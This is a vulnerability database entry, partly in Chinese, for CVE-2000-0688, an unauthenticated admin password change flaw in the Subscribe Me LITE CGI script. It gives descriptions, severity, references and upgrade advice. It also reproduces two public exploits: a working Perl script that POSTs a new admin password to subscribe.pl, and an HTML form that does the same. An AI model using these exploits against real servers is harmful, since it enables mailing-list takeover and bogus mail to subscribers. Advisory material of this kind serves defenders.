CVE-2000-0688
CVSS7.5
发布时间 :2000-10-20 00:00:00
修订时间 :2016-10-17 22:07:23
NMCOES    

[原文]Subscribe Me LITE does not properly authenticate attempts to change the administrator password, which allows remote attackers to gain privileges for the Account Manager by directly calling the subscribe.pl script with the setpwd parameter.


[CNNVD]CGI脚本中心Subscribe Me LITE管理密码变更漏洞(CNNVD-200010-061)

        Subscribe Me LITE不再正授权证改变管理员密码行为。远程攻击者可以通过直接调用带有setpwd参数的subscribe.pl脚本提升帐户管理员特权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0688
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0688
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-061
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-08/0292.html
(VENDOR_ADVISORY)  BUGTRAQ  20000823 Subscribe Me Vulnerability
http://marc.info/?l=bugtraq&m=96722957421029&w=2
(UNKNOWN)  BUGTRAQ  20000823 Re: Subscribe Me CGI Vulnerability
http://www.cgiscriptcenter.com/subscribe/
(UNKNOWN)  CONFIRM  http://www.cgiscriptcenter.com/subscribe/
http://www.securityfocus.com/bid/1607
(VENDOR_ADVISORY)  BID  1607

- 漏洞信息

CGI脚本中心Subscribe Me LITE管理密码变更漏洞
高危 访问验证错误
2000-10-20 00:00:00 2005-10-20 00:00:00
远程※本地  
        Subscribe Me LITE不再正授权证改变管理员密码行为。远程攻击者可以通过直接调用带有setpwd参数的subscribe.pl脚本提升帐户管理员特权。

- 公告与补丁

        CGI Script Center has eliminated this vulnerability with the latest release of Subscribe Me Lite. It is available for download at the following location:
        http://www.cgiscriptcenter.com/subscribe/

- 漏洞信息 (20176)

CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (1) (EDBID:20176)
cgi remote
2000-08-23 Verified
0 teleh0r
N/A [点击下载]
source: http://www.securityfocus.com/bid/1607/info

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.

#!/usr/bin/perl -w

## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
## This exploits changes the administrator password and
## let's anyone take over the mailing list. You can send
## bogus e-mail to everyone on the list.
##
## May work on earlier versions, but not sure - not sure
## if it will work on the Professional version either.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
    print("Usage: $0 <target> <newpass>\n");
    exit(1);
}

my($target,$newpass,$crypt,$length,$command,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$newpass) = @ARGV;

$crypt = crypt($newpass, 'aa');
$length = 34 + length($newpass);

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/subscribe.pl\n");
print("New password: $newpass / $crypt\n\n");

$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$sploit=
"POST /cgi-bin/subscribe.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(2);
print("Check out: http://$target/cgi-bin/subscribe.pl\n");

exit(0);		

- 漏洞信息 (20177)

CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (2) (EDBID:20177)
cgi remote
2000-08-23 Verified
0 n30
N/A [点击下载]
source: http://www.securityfocus.com/bid/1607/info
 
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.


<html>
<FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
    <CENTER><BR>
    <TABLE BORDER="0" WIDTH="400">
      <TBODY>
      <TR>
        <TD>
        
        <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
          Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
        <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
        <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
        <CENTER>
        <TABLE BORDER="0">
          <TBODY>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="CENTER"><BR>
            <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
            <TD><BR>
            <INPUT TYPE="RESET" NAME=""></TD>
          </TR></TBODY>
        </TABLE></CENTER></TD>
      </TR></TBODY>
    </TABLE>
<FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
</html>
		

- 漏洞信息

13340
Subscribe Me LITE subscribe.pl Admin Password Modification
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2000-08-23 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.01 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

CGI Script Center Subscribe Me LITE Administrative Password Alteration Vulnerability
Access Validation Error 1607
Yes Yes
2000-08-23 12:00:00 2009-07-11 02:56:00
Posted to Bugtraq on August 23, 2000 by n30 <n30@alldas.de>.

- 受影响的程序版本

CGI Script Center Subscribe Me Lite 2.0
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Sun Solaris 8_sparc
- Sun SunOS 4.1.4

- 漏洞讨论

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.

- 漏洞利用

n30 &lt;n30@alldas.de&gt; has released the exploit cgisubme.html.

teleh0r &lt;teleh0r@doglover.com&gt; has released the exploit sublite-xploit.pl.

- 解决方案

CGI Script Center has eliminated this vulnerability with the latest release of Subscribe Me Lite. It is available for download at the following location:

http://www.cgiscriptcenter.com/subscribe/

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站